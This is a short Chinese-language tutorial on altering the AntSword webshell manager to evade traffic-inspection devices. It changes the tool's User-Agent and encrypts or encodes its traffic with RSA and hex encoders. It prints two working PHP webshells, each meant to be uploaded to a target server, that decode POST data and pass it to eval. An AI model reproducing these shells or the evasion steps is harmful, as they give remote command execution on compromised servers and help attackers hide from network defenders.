蚁剑特征修改

简介

我们常常在测试过程中经常用到蚁剑,如果没有修改一些特征,会被一些流量设备轻易的发现,所以在这里写一下对蚁剑的一些特征进行修改

修改UA头

新版本蚁剑已经将UA头改为随机获取了,这里讲一下老版本的

首先在蚁剑中设置代理到burp

在burp的数据包中能清楚的看到蚁剑的特征

在目录/modules/request.js文件中修改UA头

/modules/update.js文件修改

修改完后,UA就变为我们自己想要的头了

流量加密

蚁剑支持rsa加密方式

直接使用自带的shell上传到目标服务器

<?php
$cmd = @$_POST['id'];
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCCVQo4Wjt9ZfRpZE4E+BBZ62E+
lWx178V16xzuYswqZuoCjo6Az9J/1wHySL73IQZgTZF5inPEfuW2Ep73aGSo0nLm
qckDmCuys7OSD+Ni2NjGzd5VQD2wP0he+TpcL7b0BJYEtdGqyGvuqZLECvtp8KTD
jukTOI/HBDUjCyhzhwIDAQAB
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
$cmd = '';
foreach ($cmds as $value) {
  if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
    $cmd .= $de;
  }
}
eval($cmd);

链接前得新建一个ras的编码器,在链接shell的时候使用

链接的时候选择我们刚才新建的编码器

蚁剑链接shll后可看到请求包已被加密

除了使用自带的一些编码器之外,我们也可以直接写编码器,该github有一些编码器的分享

这里测试一下hex的编码,先添加一个hex的编码器

上传shell到服务器

<?php
foreach($_POST as $k => $v){$_POST[$k]=pack("H*", $v);}
@eval($_POST['ant']);
?>

链接时选择hex编码器

数据已被编码